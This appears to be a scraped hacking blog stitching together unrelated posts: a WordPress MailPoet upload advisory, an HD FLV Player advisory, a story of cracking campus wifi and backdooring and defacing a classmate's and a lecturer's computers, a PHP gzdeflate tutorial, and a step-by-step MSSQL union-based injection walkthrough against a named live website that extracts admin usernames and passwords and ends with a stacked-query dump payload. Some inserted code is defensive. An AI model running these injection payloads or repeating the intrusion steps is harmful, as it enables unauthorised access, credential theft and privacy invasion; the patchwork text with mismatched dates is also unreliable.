Tuesday, February 3, 2015

Marc-Alexandre Montpas, from our research team, found a serious security vulnerability in the MailPoet WordPress plugin. This bug allows an attacker to upload any file remotely to the vulnerable website (i.e., no authentication is required).

This is a serious vulnerability. The MailPoet plugin (wysija-newsletters) is a very popular WordPress plugin (over 1,700,000 downloads). This vulnerability has been patched; if you run the WordPress MailPoet plugin, please upgrade ASAP!

Are you affected?

If you have this plugin activated on your website, the odds are not in your favor. An attacker can exploit this vulnerability without having any privileges or accounts on the target site. This is a major threat: it means every single website using the plugin is vulnerable.

The only safe version is 2.6.7, which was just released a few hours ago (2014-Jul-01).

Why is it so dangerous?

This bug should be taken seriously: it gives a potential intruder the power to do anything he wants on his victim’s website. It allows any PHP file to be uploaded. This can allow an attacker to use your website for phishing lures, sending SPAM, hosting malware, infecting other customers (on a shared server), and so on!!

Technical Details

Our research team discovered this flaw a few weeks ago and immediately disclosed it to the MailPoet team. They responded very well and released a patch as quickly as possible.

Because of the nature of the vulnerability, specifically its severity, we will not be disclosing additional technical details. The basics of the vulnerability, however, are something all plugin developers should be mindful of: the vulnerability resides in the fact that the developers assumed that WordPress’s “admin_init” hook was only called when an administrator user visited a page inside /wp-admin/.

It is an easy mistake to make, and they used that hook (admin_init) to verify whether a specific user was allowed to upload files.

However, any call to /wp-admin/admin-post.php also executes this hook, without requiring the user to be authenticated, thus making their theme upload functionality available to everybody.

Pro-tip: If you are a developer, never use the admin_init hook (or is_admin()) as an authentication method.
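To make the pro-tip concrete, here is an added illustration (not MailPoet’s code; the plugin, function, capability and nonce names are hypothetical) showing the pattern the advisory describes beside a handler that checks who is asking:

```php
<?php
// Added illustration, not MailPoet's code; plugin, function and nonce names
// are hypothetical. admin_init fires on every load of admin-post.php and
// admin-ajax.php, and is_admin() only reports that an admin-area script is
// running, so neither says anything about who sent the request.

// Pattern the advisory describes: the handler runs for anonymous visitors,
// because is_admin() is true inside admin-post.php regardless of login state.
function vulnplugin_upload_insecure() {
    if ( ! is_admin() || empty( $_FILES['theme_zip'] ) ) {
        return;
    }
    vulnplugin_store_zip( $_FILES['theme_zip'] ); // reachable by anyone
}
add_action( 'admin_init', 'vulnplugin_upload_insecure' );

// Hardened form: hook a specific admin-post action (it only fires for
// logged-in users unless the nopriv_ variant is also registered), demand a
// capability, verify a nonce, and check that the upload really is a zip.
function vulnplugin_upload_secure() {
    if ( ! current_user_can( 'install_themes' ) ) {
        wp_die( 'Insufficient privileges.', 403 );
    }
    check_admin_referer( 'vulnplugin_theme_upload' ); // dies if the nonce fails
    if ( empty( $_FILES['theme_zip']['tmp_name'] ) ) {
        wp_die( 'No file was uploaded.', 400 );
    }
    $file  = $_FILES['theme_zip'];
    $check = wp_check_filetype_and_ext( $file['tmp_name'], $file['name'] );
    if ( 'zip' !== $check['ext'] ) {
        wp_die( 'Only .zip archives are accepted.', 400 );
    }
    $result = vulnplugin_store_zip( $file );
    if ( isset( $result['error'] ) ) {
        wp_die( esc_html( $result['error'] ), 400 );
    }
    wp_safe_redirect( admin_url( 'themes.php?vulnplugin=uploaded' ) );
    exit;
}
add_action( 'admin_post_vulnplugin_theme_upload', 'vulnplugin_upload_secure' );

// Hypothetical helper shared by both handlers: hands the file to WordPress'
// own upload routine instead of moving it by hand.
function vulnplugin_store_zip( array $file ) {
    require_once ABSPATH . 'wp-admin/includes/file.php';
    return wp_handle_upload( $file, array( 'test_form' => false ) );
}

// The form that targets the secure handler must POST to
// admin_url( 'admin-post.php' ) with a hidden action=vulnplugin_theme_upload
// field and wp_nonce_field( 'vulnplugin_theme_upload' ) for the nonce check.
```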

How should you protect yourself?

Again, update the plugin as soon as possible. Keeping WordPress and all plugins updated is the first step to keeping your sites secure.

Vulnerability affecting HD FLV Player

We’ve been notified of a critical vulnerability affecting the HD FLV Player plugin for Joomla!, WordPress and custom websites. It was silently patched on Joomla! and WordPress, leaving the custom website version vulnerable.

Furthermore, websites running this plugin are also at risk of being abused to send spam emails, an issue which wasn’t fixed in the updated version.

Impacts of the Vulnerability

Websites using one of the aforementioned CMS applications and running an outdated version are vulnerable to an Arbitrary File Download vulnerability which could be used, depending on the platform, to take control of the targeted website. It is important to note that websites using the custom version of this plugin are still vulnerable.

The issue is found in the following files: download.php and email.php

This is what the Download.php code looks like:


From this snippet we can see how the attacker is able to download almost any file they like from the server. There are no security checks applied before accessing this file, making it accessible, and exploitable, to anyone who knows the URL structure to the file.
The same goes for email.php. It filters the variables used to send emails:

Then it assumes that if the provided “Referer” field matches the website’s URL, it is okay to send this email:

Unfortunately, the “Referer” field can easily be modified by the attacker to match pretty much anything they want, so validating requests this way is no more secure.

Update (or delete)!

This is a critical vulnerability.

If you use this plugin on a custom website, we highly recommend that you remove these two files (download.php and email.php). For WordPress/Joomla! users, be sure to update your plugins/extensions; in this instance applying an update should protect you from the Arbitrary File Download vulnerability. You should still remove the “email.php” file from your site to prevent your mail server’s IP from getting blacklisted, something we see often.

Thursday, January 22, 2015

The Story of a Student Who Fell in Love on His First Day of College

My first day at university,

As a child I was a quiet kid who didn't talk much with the people around me, and the same went for my love life :D
Without too much small talk, I want to tell you about an experience that could be called my own, or just my imagination for the sake of a story.
After finishing secondary school I wanted to go to college, which honestly wasn't really my wish either :) but what can you do :D. My parents told me to take an IT major, since I had already been hooked on this thing called the internet for almost 4 years :)
But I didn't want to study IT at a university, especially one in Aceh, because I knew: what's the point of learning to be a programmer out in the villages? Even in Indonesia itself programmers aren't needed, unlike abroad, so for that reason I didn't want to go into IT, because people only need a reinstall and are scared of this thing called a virus when Acunetix detects one, lol, and the pay for that can be called wow :0.
First day of college in whatever uniform I had, and I looked very nerdy and dumb XP :v since I enrolled in the tailoring program :) And right then my eyes didn't blink at the sight of an angel about to descend from the sky, like the Jaka Tarub story :v and my heart beat fast, really fast :) and in my heart I said "I'm in love"
I continued on to my first class and on the way I met someone and asked:
do you know that girl in the blue shirt??
He answered right away:
ohhh that's an IT student, she studies here too and she's kind of arrogant when she meets juniors like us :) and she's a smart student too when it comes to IT,
and she's also one of the prettiest here, her name is Nikita :)
wow, no wonder, I thought, I like her LOL, and that older guy was nice too :v
After the first period I left my class looking for fresh air because it was really hot in the classroom,
and once again my eyes didn't blink for a moment because I saw that girl in the blue shirt from before :) carrying a laptop bag
and heading to a lab, followed by her classmates.
The mood changed seeing the IT students go to the lab; maybe they were going to learn about the web, I thought.
I was very happy and hurried to grab my junker of a laptop, which despite being a junker is decent enough for browsing with 50+ tabs :v
Right away I switched my junker on :) running Windows XP, the world's failed OS XD
Then I looked for the campus wifi network and found a lot of wifi, and the campus wifi's name ID was visible as
Lab xxxx. Without asking anyone, I opened a console on the junker and spent just a few minutes making a wordlist with that school's name:
xxxx2011
xxxx2014 etc.
And I tried to find the active SSID and blah blah blah, I'm not explaining how, and TADAAAA...
The wifi password was in hand. I thought about scanning the clients online on that wifi, and before I knew it,
again and again and again, why are they still using Tp-li** whose bug is already a failure, it even seems like every Tp-**** has a backdoor planted in it,
and I don't know whether the ones who make the product know about it or did it themselves; no need to discuss it, it's not important :)
So I abandoned the scanner on my Windows and switched to just using the wifi's bug, to make it easier.
In less than a few minutes my junker and I found the wifi admin password and, without more blah blah, I went straight into the wifi admin
and immediately saw the clients' IPs and MAC addresses :) There were about 20+ online :)
First I started guessing the IP of that girl named Nikita, because she was my target XP :v
First I opened the topmost IP since she was the first to enter that lab, ehhhhhh bullshit, after I opened that IP in
my pretty browser, ehhhh it turned out that IP belonged to the lecturer..
How did I know??
Obviously I knew...
Its index was all lesson material, from mysql to building websites and blah blah blah to the end, and I closed that IP right away,
then I remembered, ehhh why close it, at the end of the story the lecturer gets pranked too LoL :v
I continued with the second IP, ehhhh so happy bro, clearly visible in its index was the name Copyright Nikita blah blah,
and yesss, I thought :v
I looked for a way into that girl's computer and without thinking long:
if that girl uses Windows 8 or 7, she might be using wamp or xampp.
So I tried typing in my browser the IP ***.***.***.**/xampp and bullshit, the orange page appeared.
Then I tried to access its mysql and bullshit for the umpteenth time, its mysql had no password.
Maybe just coincidence, yeah, or she really is smarter LOL :)
My junker and I looked for file upload bugs on that web and it turned out there was one in the xampp folder itself, maybe for practising how to upload, yeah :)
I went straight in with my own simply edited backdoor on the girl's computer,
After uploading, I opened it right away at ip/girl.php, tadaa, the backdoor was accessible and without thinking I
tried to replace the index, ehhhh wait a moment, I thought, let me have a look, ahhh at what that girl likes and what she often does :v
with the ls command I found lots of files in the xampp dir and I tried to access her system data with the command cd ..
and jreeeng jreehhhhh everything was visible, from her downloading photos of Korean guys or whatever :v :v not allowed to know :P secret :P
After a few minutes of looking through her computer's contents I intended to prank that girl :P
Why so mean???
Not mean, I just wanted to get acquainted :P First I backed up the index and also backed up the index in her xampp dir, and I replaced it with a
nosy deface script of my own making with romantic sounds, complete with her photo that I'd downloaded earlier :P plus a few short words from me
The words went more or less like this:
"blah blah blah
blah blah blah blah" Not allowed to know :P :P complete with a redirect to my FB, Pooi Chai, or /fb.me/iloveyou7789
hahahahaha, I'm sure that girl was really shocked seeing her web page with her own photo and romantic words :v
And while on FB I saw an inbox message: later after school meet me at the gate :)
yeahahhhhhh yeahhhh hooray, I thought :) And that's not the whole story; getting even more mischievous, the index of the lecturer's web running on localhost
was also TESTED by Apa Rabo :v :v :v
ANDDD ANDDDD after that the junker went straight back into its bag :P :v :v
After school I waited for that girl :) and she asked to get acquainted,
wowww right, bro :v :v and she asked: what semester are you in??
In a low voice I answered: I'm a new student, kak :/
What major??
Tailoring, kak :/
heheheheh the girl laughed :) you think this is funny or what, I whispered in my heart :D
Ehhh don't call me kak, just call me by my name, Nikita; what's your name??
Dono, kak :/ :/
And in the end she gave me her phone number, and it turned out she's a rich kid too, bro, she drives a car to college while I only
use my parents' junker :) and I'm proud :) )
And in the end????
Figure it out yourself
I'm too lazy to write any more :P

SOOOOOOOOOOOOOOOOOO
THE POINT is I'm just sharing a bit about a way to deface with a method???
What method, yeah, something like that,
the Tacky Bin Wondrous Method by pooi chai
Use your knowledge in its proper place :) and don't do damage :)
Byeeeeeeeeeee,,,,,, until in the end that Nikita who fell in love ended up in the arms of nerdy DONO :D :D
Well, one more thing, the language is also unclear; please bear with it since I've only just started writing,
and the sentences are disorganized too, and if it were graded in Indonesian
the score would be -5 :v but bear with it, since it's just sharing. Byyee, beautiful

Easy PHP Encode and Decode

That brings us to our third function, gzdeflate(), which is used to “compress the given string using the DEFLATE data format.”
Again, not gonna veer off — let’s stay focused with a quick example.

Let’s say we want to “gzdeflate” the following string:
<?php $string = 'Encoding and Decoding Encrypted PHP Code'; ?>
We run this string through gzdeflate() and set it as a variable named $compressed:
<?php $compressed = gzdeflate($string); ?>
Echoing the $compressed variable to the browser, we get this bizarre-looking gibberish:


s�K�O��KWH�KQpI�r\���*JRS��SR

To “decode” this alien-speak, we inflate it with the converse function, gzinflate(), to restore the original string. Here is an example that returns the original string to a variable named $uncompressed:
$uncompressed = gzinflate(gzdeflate($string));

Echoing $uncompressed, we see the original string as expected:
Encoding and Decoding Encrypted PHP Code

Copy/paste example:
<?php
// gzinflate()/gzdeflate() example
$string       = 'Encoding and Decoding Encrypted PHP Code';
$compressed   = gzdeflate($string);
$uncompressed = gzinflate($compressed);
echo $compressed . "\n";
echo $uncompressed;
?>
Parameters
Also worth mentioning: whereas the first two functions — str_rot13() and base64_encode() — accept only one parameter (the input $string), the inflate/deflate functions accept two parameters. Perhaps surprisingly, these second parameters are different between the two functions:
-gzdeflate() — level = the level of compression (0 to 9)
-gzinflate() — length = the maximum length of data to decode
Returning to our example, let’s employ these second parameters to help visualize:

<?php
// example using second parameters
$string       = 'Encoding and Decoding Encrypted PHP Code';
$compressed   = gzdeflate($string, 9);                   // compression level set to 9 = maximum
$uncompressed = gzinflate($compressed, strlen($string)); // length set to same as $string
echo $compressed . "\n";
echo $uncompressed;
?>
And the result as displayed in a browser:
s�K�O��KWH�KQpI�r\���*JRS��SR

Encoding and Decoding Encrypted PHP Code
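The same three functions are what obfuscated PHP typically chains together, so here is an added example (not from the original article) that unwraps such a chain in the reverse order, applying gzinflate()’s length parameter as a size cap and never calling eval(); the wrapper it decodes is constructed inline from the article’s own string:

```php
<?php
// Added example, not from the article. Unwraps the obfuscation chain that a
// wrapper such as eval(str_rot13(gzinflate(base64_decode('...')))) applies,
// by reading the function names and running each decoder innermost first.
// Nothing is ever eval()ed: the output is returned as text for inspection.

const MAX_INFLATED = 1 << 20; // passed as gzinflate()'s second parameter to cap decoded size

// Decoders this tool is willing to run; anything else in the chain is refused.
const DECODERS = ['base64_decode', 'gzinflate', 'gzuncompress', 'str_rot13', 'strrev', 'urldecode'];

function build_sample_wrapper(string $payload): string
{
    // Constructed sample: payload -> str_rot13 -> gzdeflate -> base64_encode.
    $blob = base64_encode(gzdeflate(str_rot13($payload), 9));
    return "eval(str_rot13(gzinflate(base64_decode('{$blob}'))));";
}

function decode_eval_chain(string $snippet): string
{
    if (!preg_match("/eval\\(((?:\\w+\\()+)'([^']*)'\\)+;?/", $snippet, $m)) {
        throw new RuntimeException("no eval(fn(fn('literal'))) wrapper found");
    }
    $funcs = array_filter(explode('(', $m[1])); // outermost first: str_rot13, gzinflate, base64_decode
    $data  = $m[2];
    foreach (array_reverse($funcs) as $fn) {     // innermost decoder runs first
        if (!in_array($fn, DECODERS, true)) {
            throw new RuntimeException("refusing to run '{$fn}'");
        }
        // gzinflate()'s length limit stops a deliberately huge blob from exhausting memory.
        $data = ($fn === 'gzinflate') ? @gzinflate($data, MAX_INFLATED) : @$fn($data);
        if ($data === false) {
            throw new RuntimeException("{$fn} failed: truncated or oversized blob?");
        }
    }
    return $data;
}

$payload = "<?php echo 'Encoding and Decoding Encrypted PHP Code'; ?>";
$wrapper = build_sample_wrapper($payload);
echo $wrapper, "\n";
echo decode_eval_chain($wrapper), "\n"; // prints $payload again
```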

Saturday, November 1, 2014

Step By Step MSSQL Union Based Injection

In the Name of ALLAH the Most Beneficent and the Merciful

After a lot of tutorials on MySQLi, now we are moving to MSSQLi. Yeah!! It may not be some very new shit you get over here, but I included some of the new tricks which rummy, me and Sufyan found while learning, and it could be a handy guide for a n00b like me while injecting into a MSSQL based website. So first of all we need to know the basics of injecting; all the basics, including finding the type of injection, database testing and finding the columns etc., are the same as for other databases, so I'll suggest you read the basics before you start here if you didn't read them yet.
SQLi Basics 1
SQLi Basics Part 2
SQLi Basics Part 3
Detecting the Database
In this Series of MSSQL Injection we will learn the following types of Injection for MSSQL 
1. MSSQL Union Based Injection
2. MSSQL Error Based Injection
3. MSSQL Blind Injection
4. MSSQL Time Based Blind Injection
5. MSSQL Error Based Blind Injection
6. MSSQL DIOS (Dump in One Shot)

So in this tutorial we'll start with MSSQLi Union Based injection and yeah also will discuss solution for some shit which happens while injecting into MSSQL database.
Actually the truth is something like when we see that the website we want to hack is on PHP/MySQL our reaction is like: 


But if the website we want to hack is on ASP/MSSQL then the reaction is somewhat:


But I hope that by the time we finish up with our complete series on MSSQLi we'll be pretty satisfied with our knowledge of MSSQL injection.
Here is the complete Video:
For this tutorial we will use http://aquaservices.co.in/Product.aspx?Id=13 as this site gives most of the problems which you might face while MSSQL Injection.

So the checking part is the same as for MySQL: first putting a single quote and then a double quote and checking the error, and I came to know this one is a single quote based injection.
http://aquaservices.co.in/Product.aspx?Id=13%27
ERROR
http://aquaservices.co.in/Product.aspx?Id=13%22
ERROR
Information: When both a single quote and a double quote give an error, there is a high probability that the injection type is integer based. With a single-quote-based injection the double quote does not give an error, and with a double-quote-based injection the single quote does not give an error; when both the single quote and the double quote give an error, apply the golden rule that the injection is integer type.

Now to go ahead we need to know the comment type for MSSQL.
Comment    Name
--         Comment Type 1
--+        Comment Type 2
--+-       SQL Comment
/**/       Inline Comment
;          Null Byte

Now lets try the basic -- comment with our target
http://aquaservices.co.in/Product.aspx?Id=13--
working fine.
http://aquaservices.co.in/Product.aspx?Id=13 order by 1--
No Error
http://aquaservices.co.in/Product.aspx?Id=13 order by 100--
Here comes the error : The order by position number 100 is out of range of the number of items

Now we can continue with order by, and in the end we come to know that 8 is the last working column. The next part is using the union select query.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select 1,2,3,4,5,6,7,8--
Again we got an error : Operand Type Clash: text is incompatible with int

In case of such errors on the union select statement we have the option to use null in all columns, so let's try that.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union Select null,null,null,null,null,null,null,null--
Again we got a error : The text data type cannot be selected as DISTINCT because it is not comparable.

Here's one more type of error you can find while doing MSSQL injection, and the solution for this is just to use "Union All Select" in place of "Union Select". Let's try.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select null,null,null,null,null,null,null,null--
Again we got an error : Conversion from type 'DBNull' to type 'String' is not valid. Also known as a Datatype Mismatch Error.

The solution for this type of error: here we can see a DBNULL to STRING mismatch, so we have to convert each column one by one and see if we can make it work. To put a string we can use single quotes, but I prefer using the db_name() function to avoid some errors. Here we have eight columns; changing each column one by one is easy here, but it could be a pain when there are 20 or more columns, so I have developed a payload generator to make that easy for us. I am gonna generate the payloads which will put db_name() in the eight columns one by one.

Here is the link

Now you can use Burp Suite or ZAP Proxy to Fuzz the above payload on place of columns as you can see in the video.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave this column as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,db_name(),4,5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that columns as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select db_name(),2,3,db_name(),5,6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that column as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,db_name(),6,7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,db_name(),7,8--
Error : Operand type clash: text is incompatible with int (So its better Leave that parameter as int only)
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),8--
Here we can see the second Column Getting printed.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,2,3,4,5,6,db_name(),db_name()--
Conversion failed when converting the nvarchar value 'AquaService' to data type bit. (Here we can see the database name in the error.)
Now we can put @@version in place of the vulnerable column to get the current version from the database.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,@@version,3,4,5,6,db_name(),8--

And we got the version, now we can get the current database name using db_name().
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,db_name(),3,4,5,6,db_name(),8--

There are some other ways also to collect some more information from MSSQL, which are given here:
Query/Function                   Output
@@version                        Current Version
user_name()                      Current User
user, system_user, current_user  Current User
db_name()                        Current Database
@@SERVERNAME                     Hostname
Now we will extract the table names; here the syntax is a little bit different from MySQL because of the lack of a LIMIT clause in MSSQL.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 1 table_name from information_schema.tables order by 1) as shit order by 1 desc--
We got the first table name : AdminLogin
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 2 table_name from information_schema.tables order by 1) as shit order by 1 desc--
We got the second table name : Certificate
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,table_name,3,4,5,6,db_name(),8 from (select top 3 table_name from information_schema.tables order by 1) as shit order by 1 desc--
We got the fourth table name : ClientList
In the same manner we can get all the tables one by one. Now let's get the columns. I will extract the columns from the AdminLogin table.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 1 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the first column from AdminLogin Table : IsActive
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 2 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Second column from AdminLogin Table : Password
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,column_name,3,4,5,6,db_name(),8 from (select top 4 column_name from information_schema.columns where table_name='AdminLogin' order by 1) as shit order by 1 desc--
We got the Third column from AdminLogin Table : UserName
We got the table names and the column names, and now let's extract the data from them. For concatenation we can use %2b, which is +.
http://aquaservices.co.in/Product.aspx?Id=13 and 0=1 Union All Select 1,username%2b' '%2bpassword,3,4,5,6,db_name(),8 from AdminLogin--
Now, in the end, I would like to show you how to make the whole process a lot faster by using MSSQL DIOS.
http://aquaservices.co.in/Product.aspx?Id=13;begin declare @x varchar(8000), @y int, @z varchar(50), @a varchar(100) declare @myTbl table (name varchar(8000) not null) SET @y=1 SET @x='injected by ZEN :: 
'%2b@@version%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Database : '%2bdb_name()%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @z='' SET @a='' WHILE @y<=(SELECT COUNT(table_name) 
from INFORMATION_SCHEMA.TABLES) begin SET @a='' Select @z=table_name from INFORMATION_SCHEMA.TABLES where TABLE_NAME not in (select name from @myTbl) select @a=@a %2b column_name%2b' : ' 
from INFORMATION_SCHEMA.COLUMNS where TABLE_NAME=@z insert @myTbl values(@z) SET @x=@x %2b  CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Table: '%2b@z%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62)%2b'Columns
 : '%2b@a%2b CHAR(60)%2bCHAR(98)%2bCHAR(114)%2bCHAR(62) SET @y = @y%2b1 end select @x as output into temp_dios_sample END--

It will give an error, but actually it's making the DIOS table, so now let's try checking the output under temp_dios_sample.

And here we got the complete output at once. Before I finish I'd like to show you some basic errors in MSSQLi.
Errors:
- Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
- [Microsoft][SQL Server Native Client 10.0][SQL Server]Executing SQL directly; no cursor.
- Microsoft VBScript runtime error '800a000d'
- Type mismatch: 'id'
- Error Executing Database Query.
- Line 3: Incorrect syntax near ''.
- The text data type cannot be selected as DISTINCT because it is not comparable.
- Operand type clash: text is incompatible with int
So Here we are finished with MSSQL Union Based Injection.
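Seen from the other side of the wire, every step of this walkthrough leaves a recognisable request in the access log. The following is an added example (not part of the tutorial; the log lines are constructed and the signature names are my own) that scans Apache-style log lines for exactly those shapes: quote probes, ORDER BY column counting, UNION ALL SELECT, information_schema reads, MSSQL-specific functions, TOP n sub-selects and stacked DECLARE blocks.

```php
<?php
// Added example, not part of the tutorial. Flags access-log requests that
// match the probing steps shown above. Log lines below are constructed.

const SIGNATURES = [
    'quote_probe'      => '/=\d+[\'"]\s*$/',
    'order_by_probe'   => '/\border\s+by\s+\d+\s*--/i',
    'union_select'     => '/\bunion\s+(all\s+)?select\b/i',
    'schema_enum'      => '/information_schema\.(tables|columns)/i',
    'mssql_function'   => '/db_name\(\)|@@version|@@servername|\bsystem_user\b/i',
    'top_n_subselect'  => '/\bselect\s+top\s+\d+\b/i',
    'stacked_query'    => '/;\s*(begin\s+)?declare\s+@\w+/i',
    'trailing_comment' => '/(--|\/\*\*\/)\s*$/',
];

/** Names of the signatures a request target triggers (empty array = clean). */
function score_request(string $target): array
{
    // Decode as the application would before the value reaches the query: %20 -> space, %2b -> +
    $decoded = urldecode($target);
    $hits = [];
    foreach (SIGNATURES as $name => $re) {
        if (preg_match($re, $decoded)) {
            $hits[] = $name;
        }
    }
    return $hits;
}

/** Parse Apache combined-style lines and keep only requests with at least one hit. */
function scan_log(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        // ip ident user [time] "METHOD target PROTO" status size ...
        if (!preg_match('/^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) \S+" (\d{3})/', $line, $m)) {
            continue;
        }
        $hits = score_request($m[3]);
        if ($hits) {
            $findings[] = ['ip' => $m[1], 'status' => (int) $m[4], 'target' => $m[3], 'hits' => $hits];
        }
    }
    return $findings;
}

// Constructed sample log: one benign request, then the probing sequence from the walkthrough.
$log = [
    '203.0.113.5 - - [01/Nov/2014:10:00:00 +0000] "GET /Product.aspx?Id=13 HTTP/1.1" 200 5123',
    '203.0.113.5 - - [01/Nov/2014:10:00:05 +0000] "GET /Product.aspx?Id=13%27 HTTP/1.1" 500 812',
    '203.0.113.5 - - [01/Nov/2014:10:00:09 +0000] "GET /Product.aspx?Id=13%20order%20by%20100-- HTTP/1.1" 500 812',
    '203.0.113.5 - - [01/Nov/2014:10:00:20 +0000] "GET /Product.aspx?Id=13%20and%200=1%20Union%20All%20Select%201,@@version,3,4,5,6,db_name(),8-- HTTP/1.1" 200 5210',
    '203.0.113.5 - - [01/Nov/2014:10:01:02 +0000] "GET /Product.aspx?Id=13%20and%200=1%20Union%20All%20Select%201,table_name,3,4,5,6,db_name(),8%20from%20(select%20top%201%20table_name%20from%20information_schema.tables%20order%20by%201)%20as%20t%20order%20by%201%20desc-- HTTP/1.1" 200 5210',
    '203.0.113.5 - - [01/Nov/2014:10:02:40 +0000] "GET /Product.aspx?Id=13;begin%20declare%20@x%20varchar(8000)%20SET%20@y=1%20end-- HTTP/1.1" 500 812',
    '198.51.100.7 - - [01/Nov/2014:10:03:00 +0000] "GET /Product.aspx?Id=21 HTTP/1.1" 200 5098',
];

foreach (scan_log($log) as $f) {
    printf("%s %d %s -> %s\n", $f['ip'], $f['status'], $f['target'], implode(',', $f['hits']));
}
```

The 500 responses clustered on one client IP are the same signal the tutorial reads as "error", so pairing the status code with the signature hits is what separates a real probing sequence from an isolated false positive.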